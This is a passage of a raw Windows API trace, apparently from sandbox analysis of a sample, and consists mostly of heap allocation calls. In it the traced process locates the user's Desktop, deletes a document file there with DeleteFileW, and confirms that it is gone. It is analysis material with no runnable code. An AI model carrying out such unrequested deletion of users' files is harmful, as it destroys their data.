out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0165.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0165.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0165.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0165.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34efb00 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.486] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0165.487] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0165.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.487] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0165.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0165.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GhiVvZ14WbSoIVTo6M.odt", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GhiVvZ14WbSoIVTo6M.odt", lpFilePart=0x8bedfc*="GhiVvZ14WbSoIVTo6M.odt") returned 0x3c [0165.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0165.489] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GhiVvZ14WbSoIVTo6M.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ghivvz14wbsoivto6m.odt")) returned 0x20 [0165.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GhiVvZ14WbSoIVTo6M.odt", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58359620, ftCreationTime.dwHighDateTime=0x1d4c93a, ftLastAccessTime.dwLowDateTime=0xd6659fc0, ftLastAccessTime.dwHighDateTime=0x1d4cda1, ftLastWriteTime.dwLowDateTime=0xd6659fc0, ftLastWriteTime.dwHighDateTime=0x1d4cda1, nFileSizeHigh=0x0, nFileSizeLow=0xc4e7, dwReserved0=0x45, dwReserved1=0x4, cFileName="GhiVvZ14WbSoIVTo6M.odt", cAlternateFileName="GHIVVZ~1.ODT")) returned 0xaa56a0 [0165.489] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GhiVvZ14WbSoIVTo6M.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ghivvz14wbsoivto6m.odt")) returned 1 [0165.491] FindNextFileW (in: hFindFile=0xaa56a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58359620, ftCreationTime.dwHighDateTime=0x1d4c93a, ftLastAccessTime.dwLowDateTime=0xd6659fc0, ftLastAccessTime.dwHighDateTime=0x1d4cda1, ftLastWriteTime.dwLowDateTime=0xd6659fc0, ftLastWriteTime.dwHighDateTime=0x1d4cda1, nFileSizeHigh=0x0, nFileSizeLow=0xc4e7, dwReserved0=0x45, dwReserved1=0x4, cFileName="GhiVvZ14WbSoIVTo6M.odt", cAlternateFileName="GHIVVZ~1.ODT")) returned 0 [0165.491] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0165.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.492] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0165.492] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0165.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.492] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0165.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GhiVvZ14WbSoIVTo6M.odt", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GhiVvZ14WbSoIVTo6M.odt", lpFilePart=0x8bf658*="GhiVvZ14WbSoIVTo6M.odt") returned 0x3c [0165.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0165.494] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GhiVvZ14WbSoIVTo6M.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ghivvz14wbsoivto6m.odt")) returned 0xffffffff [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.495] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0165.495] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.495] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, 